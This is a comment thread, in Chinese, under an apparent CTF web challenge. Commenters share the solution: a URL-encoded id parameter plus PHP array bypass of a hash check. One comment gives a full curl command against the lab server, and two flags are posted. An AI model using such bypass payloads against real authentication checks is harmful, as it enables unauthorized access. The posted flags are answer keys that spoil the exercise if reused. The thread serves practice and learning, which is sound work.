15614005380 @ 2024-03-07 23:20:55 👍0
三个参数。id用url编码;uname和passwd用数组绕过。对应上传输类型POST和GET。这道题就结束了。
GET-lee @ 2024-02-07 23:20:55 👍0
数组绕过,简单的很
XRain @ 2023-10-07 23:20:55 👍0
cao,搞错 === 和 and 的运算符优先级了,看来没理解的地方要好好看文档。
老渡真的不懂 @ 2023-09-07 23:20:55 👍0
真无语啊,检查了半天payload明明没问题,结果burpsuit就是没内容,换hackbar就显示了。。。。
xxt666 @ 2023-09-07 23:20:55 👍0
http://114.67.175.224:11569/?&name[]=1&id=margin passwd[]=2
wxy1343 @ 2023-06-07 23:20:55 👍0
flag{dbb5bcdc8396249afe887041eb7beaf5}
jsjm @ 2023-06-07 23:20:55 👍1
方法1.curl -d "passwd[]=2" "http://114.67.175.224:16568/?id=%6d%61%72%67%69%6e&uname[]=1"#--data不行,只能用-d参数 。--方法2.bp同样的get和post,需要额外加个头部Content-Type: applicat
龙图主人夏天 @ 2023-06-07 23:20:55 👍0
首先使用Get方法传值,?uname[]=1&&id=margin,火狐浏览器使用hackbar的平替,Max Hackbar,按F12使用为POST传值,passwd[]=2,利用数组绕过哈希,输出flag
thresheses @ 2023-06-07 23:20:55 👍0
感觉urldecode($_GET['id']);没限制到什么?
flag{dda83294530da7f5ad2e989626ab6e13}